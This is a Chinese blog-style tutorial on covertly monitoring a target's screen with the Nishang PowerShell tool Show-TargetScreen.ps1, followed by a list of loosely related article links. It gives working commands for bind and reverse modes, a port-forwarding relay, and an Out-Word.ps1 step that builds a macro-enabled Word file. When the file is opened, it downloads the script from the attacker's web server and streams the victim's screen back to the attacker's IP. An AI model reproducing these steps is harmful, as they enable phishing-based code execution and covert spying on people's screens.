使用Powershell对目标进行屏幕监控
Nishang是基于PowerShell的渗透测试专用工具。集成了框架、脚本和各种payload。这些脚本是由Nishang的作者在真实渗透测试过程中有感而发编写的,具有实战价值。包括了下载和执行、键盘记录、dns、延时命令等脚本。今天要给大家介绍的是如何通过powershell对目标的屏幕进行实时监控。
脚本下载地址如下:
https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Show-TargetScreen.ps1
使用也很简单,脚本包括了reverse以及bind模式。下面是使用示例:
0x01 Bind模式:
PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1
PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Bind -Port 3333
然后在自己的计算机上使用火狐访问目标3333端口,结果如下图:
0x02Reverse模式
attacker:
在这里可以使用创宇的py脚本转发:
https://github.com/knownsec/rtcp
执行:
rtcp [master] python rtcp.py l:5555 l:4444
监听本地5555端口以及4444端口。之后在target执行:
PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1
PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Reverse-IPAddress 192.168.74.1 -Port 5555
效果截图:
0x03 使用Powershell Client
以Out-Word.ps1作为演示示例:
生成word文件:
PS C:\Users\evi1cg\Desktop> . .\Out-Word.ps1
PS C:\Users\evi1cg\Desktop> Out-Word -PayloadURL"http://192.168.74.1/Show-TargetScreen.ps1" -Arguments"Show-TargetScreen -Reverse -IPAddress 192.168.74.1 -Port 6666"
之后将Show-TargetScreen.ps1放在我们的web根目录,测试:
开启监听:
rtcp [master] python rtcp.py l:6666 l:4444
当运行开启office宏的word时,我们就可对其屏幕进行监控,如下图:
使用Powershell对目标进行屏幕监控相关推荐
- 利用Http实现屏幕监控
使用了idhttp实现了远程屏幕监控,可以网页使用也可以客户端使用. 文件:url80.ctfile.com/f/25127180-733994640-f168b8?p=551685 (访问密码: 5 ...
- Node.JS实战34:远程屏幕监控?可以的
是否想做一个远程系统屏幕监控功能?这是个有意思的功能. Node.JS可以实现,而且很方便. 目标效果: 在网页中实时查看系统屏幕内容. 实现原理: 1.用express实现服务器: 2.当访问来临时 ...
- 用AutoHotkey写电脑屏幕监控软件
今看到一个外包项目, 要求用VB写一个电脑屏幕监控软件, 具体要求如下: 电脑屏幕监控软件功能实现: 1.电脑非空闲(根据鼠标键盘动作判断?)时,每五秒(通过配置文件设置)截屏并按时间命名(如2010 ...
- 恶意代码研究 -- 功能技术类 -- windows PE恶意代码(七)屏幕监控
屏幕监控 大致过程 绘制桌面位图 绘制鼠标光标 保存位图图像 相关API GetDesktopWindow函数 GetDC函数 CreateCompatibleDC函数 GetSystemMetric ...
- gh0st源码分析:屏幕监控
这两天一直看gh0st源码,看得也是一头雾水,下面就分析一下屏幕监控的通信过程,对屏幕扫描算法以及绘图方面就不分析了,因为我也不懂.写的有点乱,就当作个笔记了. 首先从控制端按下屏幕监控选项开始,这时 ...
- 屏幕监控中捕获鼠标位置信息
server端: 在server.h中声明:void DispatchWMMessage(char *szString); server.c中添加 void DispatchWMMessage(ch ...
- 如何在SYSTEM权限下实现屏幕监控
屏幕监控是远控软件的基本功能之一. 版权声明 作者:iprowq 现在很多远控程序的服务端通常为DLL形式,通过远程线程注入等方法插入到services.svchost等SYSTEM权限的进程中去,而 ...
- IP-guard屏幕监控,违规操作全记录
审计终端操作,溯源泄密行为,我们需要详尽记录终端的各项行为,以便管理员能够及时发现风险以及异常操作,然而仅仅通过文字记录已经不能满足企业的审计需求,一些企业在进行严格的日志审计时,常常会结合屏幕记录一 ...
- 实现屏幕监控的大体思路
屏幕监控简单说就是对进程的当前桌面进行截屏存成位图,然后将此位图数据传输到远程. 对桌面进行截图需要通过一系列Windows GDI API来完成的. 首先通过CreateDC,CreateCompa ...
最新文章
- c语言写输入汉字输出区位码程序,2017年计算机应用基础检测试题
- C语言-程序运行效率总结及注意事项
- [云炬创业基础笔记]第七章创业资源测试4
- Python对QQ音乐进行爬取并进行数据分析
- python输入print跳到documentation-习题 48: 更复杂的用户输入
- 选择不相交区间(贪心算法) By ACReaper
- 水滴石穿之页面遮罩层实现、向window.open()打开的窗口POST数据
- “那不勒斯”服务器芯片,32核/64超线程:AMD 公开 Naples “那不勒斯” 部分规格和性能...
- 【编译原理笔记14】中间代码生成:布尔表达式的回填,控制流语句的回填,switch语句的翻译,过程调用语句的翻译
- 如何使用Highscore进行XRD物相分析?
- 空间域图像增强(matlab实现)
- 四叉树 Quadtrees
- 0611 auto sorting and resend script
- [ASP.NET] 结合Web API在OWIN下实现OAuth
- 爬虫 【第一章】爬虫基本原理
- 【嵌入式项目开源】基于ESP32的墨水屏桌面小屏幕
- 谈一谈Java中的“静态”
- 分享10个红色警戒2经典MOD
- qu32调音台说明书_使用效果不错艾伦赫赛QU32调音台带中文说明书_北京金舒恺歌科技发展有限公司(亿商网手机版)...
- ai人工智能相关职业_2020年及以后的5个人工智能最佳职业
热门文章
- 钟翔平:坚持走手机浏览器架构创新之路
- 启动nginx报错/usr/local/nginx/sbin/nginx: error while loading shared libraries: libpcre.so.1: cannot ope
- Windows 7中禁用连按五次Shift键时出现粘滞键的方法
- 基于SSM框架的图片分享及评价网站设计与实现毕业设计源码201524
- 薅资本主义羊毛新姿势,英伟达K80免费用
- win7和xp系统下的防火墙配置例外
- UVA10118Free Candies
- 计算机检索终端室与目录厅的区别,图书馆建筑设计规范 条文说明 建筑设计 目录检索、出纳空间...
- 《阅读的方法》读书笔记2-2:遥远的地方
- java 连接Linux服务器并执行指令